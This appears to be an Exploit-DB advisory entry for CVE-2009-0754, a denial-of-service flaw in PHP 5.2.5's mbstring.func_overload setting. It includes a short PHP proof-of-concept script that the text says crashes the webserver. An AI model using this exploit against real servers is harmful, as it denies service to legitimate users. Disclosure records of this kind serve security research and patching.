PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability

2009-01-30T00:00:00
ID EDB-ID:32769
Type exploitdb
Reporter strategma
Modified 2009-01-30T00:00:00

Description

PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability. CVE-2009-0754. Dos exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/33542/info

PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.

Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users. 

<?php
        $v = 'Òîâà å òåñò|test.php';
        print substr($v,0,strpos($v,'|'));
?>